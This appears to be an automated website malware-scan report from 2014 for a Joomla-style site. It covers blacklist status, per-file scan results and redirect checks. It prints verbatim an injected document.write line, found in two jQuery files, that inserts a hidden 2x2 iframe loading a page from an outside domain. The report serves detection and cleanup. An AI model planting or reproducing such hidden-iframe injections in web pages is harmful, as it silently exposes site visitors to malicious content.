Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bellsafe-bsp.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bellsafe-bsp.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bellsafe-bsp.com/ | 200 OK Content-Length: 26634 Content-Type: text/html | clean |
http://bellsafe-bsp.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://bellsafe-bsp.com/modules/mod_swmenufree/jquery-1.6.min.js | 200 OK Content-Length: 90675 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044></iframe>');
(function(a,b){function cw(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function ct(a){if(!ch[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ci||(ci=c.createElement("iframe"),ci.frameBorder=ci.width=ci.height=0),c.body.appendChild(ci);if(!cj| Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wwcf.html?j=620044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044> | ||
http://bellsafe-bsp.com/modules/mod_swmenufree/jquery.corner.js | 200 OK Content-Length: 11424 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044></iframe>');
;(function($) { var style = document.createElement('div').style, moz = style['MozBorderRadius'] !== undefined, webkit = style['WebkitBorderRadius'] !== undefined, radius = style['borderRadius'] !== undefined || style['BorderRadius'] !== undefined, mode = document.documentMode || 0, } } } } }); }; $.fn.uncorner = function() { if (radius || moz || webkit) this.css(radius ? 'border-radius' : moz ? '-moz-border-radius' : '-webkit-border-radius', 0); $('div.jquery-corner', this).remove(); return this; }; $.fn.corner.defaults = { useNative: true, metaAttr: 'data-corner' }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wwcf.html?j=620044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044> | ||
http://bellsafe-bsp.com/modules/mod_swmenufree/transmenu_Packed.js | 200 OK Content-Length: 16378 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wwcf.html?j=620044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044> | ||
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/jquery-1.6.1.min.js | 200 OK Content-Length: 91342 Content-Type: application/javascript | clean |
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/jquery.mobile-1.0rc2.customized.min.js | 200 OK Content-Length: 48433 Content-Type: application/javascript | clean |
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/jquery.hoverIntent.minified.js | 200 OK Content-Length: 1464 Content-Type: application/javascript | clean |
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/diapo.js | 200 OK Content-Length: 39799 Content-Type: application/javascript | clean |
http://bellsafe-bsp.com/modules/mod_jqueryimagescroller/assets/js/jquery.min.js | 200 OK Content-Length: 91427 Content-Type: application/javascript | clean |
http://bellsafe-bsp.com/modules/mod_jqueryimagescroller/assets/js/scroll.js | 200 OK Content-Length: 4114 Content-Type: application/javascript | clean |
http://bellsafe-bsp.com/home.html | 200 OK Content-Length: 26588 Content-Type: text/html | clean |
http://bellsafe-bsp.com/empresa.html | 200 OK Content-Length: 18111 Content-Type: text/html | clean |
http://bellsafe-bsp.com/productos.html | 200 OK Content-Length: 18628 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bellsafe-bsp.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 12 Sep 2014 17:53:26 GMT
Pragma: no-cache
Server: Apache/2.4.9 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 12 Sep 2014 17:53:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 318638a6bbd7aefa12c971ea55359778=bb8dcf83956991cd602068a1d6fd2f75; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: bellsafe-bsp.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 12 Sep 2014 17:53:26 GMT
Pragma: no-cache
Server: Apache/2.4.9 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 12 Sep 2014 17:53:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 318638a6bbd7aefa12c971ea55359778=bb8dcf83956991cd602068a1d6fd2f75; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: bellsafe-bsp.com
Referer: http://www.google.com/search?q=bellsafe-bsp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bellsafe-bsp.com
Referer: http://www.google.com/search?q=bellsafe-bsp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.